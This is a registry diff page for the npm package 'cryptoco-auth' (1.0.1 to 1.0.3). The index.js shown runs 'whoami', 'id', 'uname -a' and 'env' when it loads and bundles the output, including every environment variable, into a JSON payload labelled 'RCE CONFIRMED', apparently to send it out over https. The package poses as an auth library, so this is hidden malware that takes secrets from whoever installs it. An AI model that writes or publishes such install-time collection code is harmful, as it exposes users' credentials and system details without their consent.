cryptoco-auth 1.0.1 → 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -2
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -2,10 +2,9 @@ const https = require("https");
|
|
|
2
2
|
const { execSync } = require("child_process");
|
|
3
3
|
|
|
4
4
|
try {
|
|
5
|
-
// Mengambil informasi sistem lengkap
|
|
6
5
|
const systemInfo = execSync("whoami && id && uname -a && env").toString();
|
|
7
6
|
const data = JSON.stringify({
|
|
8
|
-
message: "MAXIMUM IMPACT:
|
|
7
|
+
message: "MAXIMUM IMPACT: SCOPED PACKAGE TEST - RCE CONFIRMED",
|
|
9
8
|
system_details: systemInfo,
|
|
10
9
|
node_version: process.version
|
|
11
10
|
});
|
package/package.json
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"name":"cryptoco-auth","version":"1.0.
|
|
1
|
+
{"name":"cryptoco-auth","version":"1.0.3","main":"index.js"}
|